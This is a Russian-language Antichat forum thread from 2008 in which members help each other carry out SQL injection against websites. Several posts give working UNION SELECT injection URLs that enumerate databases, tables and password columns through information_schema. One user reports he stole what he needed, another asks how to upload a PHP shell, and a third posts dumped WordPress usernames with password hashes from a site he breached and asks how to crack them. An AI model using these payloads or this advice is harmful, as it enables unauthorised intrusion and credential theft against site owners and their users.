HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 27.11.2008, 07:29
Octave_Parango
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме:
349682

Репутация: 30
По умолчанию

Цитата:
Сообщение от 159932  
http://site.com/non.php?id=-6+union+select+1,table_schema,3,4,5,6,7,8,9,10,11, 1 2,13,14,15+from+information_schema.columns+where+t able_name='routines'+limit+1,1--
также
http://site.com/non.php?id=-6+union+select+1,concat(table_schema,0x2e,table_na me,0x3a,column_name),3,4,5,6,7,8,9,10,11, 1 2,13,14,15+from+information_schema.columns+where+t able_name='routines'--
и скажи тут результ..
по первому запросу - так же пусто, ни какой информации не выводит.

а по второму вот:

information_schema.ROUTINES:SQL_ADMIN

В принципе то же самое что и в моем случае, только дальше, делаю запрос, опять пусто.

НиПоНяТнО (голосом Реввы)
 
Ответить с цитированием

  #2  
Старый 27.11.2008, 07:53
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


По умолчанию

дай ссыль в личку
 
Ответить с цитированием

  #3  
Старый 27.11.2008, 09:35
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
По умолчанию

_Pantera_
Самое первое, что тебе нужно сделать - это посмотреть названия таблиц и названия БД в которых они лежат.
Цитата:
http://site.com/non.php?id=-6+union+select+1,2,concat(table_schema,char(58),ta ble_NAME),4,5,6,7,8+from+INFORMATION_SCHEMA.tables --
таким запросом ты узнаеш все бд )

а вот таким запросом ты посмотришь БД в которых лежит таблица..
Цитата:
http://site.com/non.php?id=-6+union+select+1,2,concat_ws(0x3a,table_schema),4, 5,6,7,8+from+information.tables+where+table_name= азвание таблы--
а вобще я бы сначало искал в каких таблицах и бд есть колонка например пасс)
Цитата:
http://site.com/non.php?id=-6+union+select+1,2,concat_ws(0x3a,table_schema,tab le_name),4,5,6,7,8+from+information.columns+where+ column_name+like+char(название поля)--

Последний раз редактировалось sabe; 27.11.2008 в 19:59..
 
Ответить с цитированием

  #4  
Старый 27.11.2008, 09:50
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546

Репутация: 1327
По умолчанию

Цитата:
Сообщение от sabe  
_Pantera_
Самое первое, что тебе нужно сделать - это посмотреть названия таблиц и названия БД в которых они лежат.
Код:
http://site.com/non.php?id=-6+union+select+1,2,concat(table_schema,char(58),ta ble_NAME),4,5,6,7,8+from+INFORMATION_SCHEMA.tables --
таким запросом ты узнаеш все бд )

Я вот непонимаю, зачем если ты не разбираешься в теме умничать?

table_schema - имя БД
table_NAME - имя таблицы


Цитата:
а вот таким запросом ты посмотришь названия таблиц и названия БД в которых они лежат..
Код:
http://site.com/non.php?id=-6+union+select+1,2,concat_ws(0x3a,table_schema),4, 5,6,7,8+from+information.tables+where+table_name=н азвание таблы--
А это что за бред???? Этим запросом ты посмотришь имя БД в которой лежит таблица "название таблы"


PS Мужики читайте литературу, я смотрю вы нахватались кусков из хеккерских форумов, а работать с БД не умеете.
 
Ответить с цитированием

  #5  
Старый 27.11.2008, 10:34
Octave_Parango
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме:
349682

Репутация: 30
По умолчанию

Всем спасибо!
Все что нужно стянул.
sabe, a+
 
Ответить с цитированием

  #6  
Старый 27.11.2008, 11:18
j0ker13
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме:
861008

Репутация: 58
По умолчанию

2pantera прав хватает по любому) потому что этот файл index.php этого же сайта)
 
Ответить с цитированием

  #7  
Старый 27.11.2008, 12:31
masternet
Участник форума
Регистрация: 18.05.2008
Сообщений: 130
Провел на форуме:
1113633

Репутация: 155
По умолчанию

вопрос..как преобразовать пхп-код в одну строку?иными словами чтобы не было пробелов...всё в одной строке?
шелл короче залить..
 
Ответить с цитированием

  #8  
Старый 27.11.2008, 12:43
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


По умолчанию

Попробуй перевести его в16битное шифрование.

Последний раз редактировалось -m0rgan-; 27.11.2008 в 12:47..
 
Ответить с цитированием

  #9  
Старый 27.11.2008, 15:00
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678

Репутация: 354
По умолчанию

Товарищи, прошу совета.

Добил необходимый мне ресурс. Там стоит походу вродпресс.
Вытащил значит следующие данные

(логин::пасс)
admin::$P$BaDgEI.EOMBqxOK7SWSWJfbPHfiVDT.
mary::$P$BQOOK8uZGPy9aPW/iZFQdVCYqfFEIe/
tom::$P$BMUL.P.H2ij4tFvv0RcZ.moF0RWId10


Это что вообще такое? o_O Это расшифровать реально (если это вообще хэши)?
Если да-то ткните как плз.
Я просто первый раз столкнулся, в недоумении...
 
Ответить с цитированием

  #10  
Старый 27.11.2008, 15:02
iddqd
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567

Репутация: 2145


По умолчанию

похоже на юниксовый мд5, но там вроде на $1$ начинаться должно...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.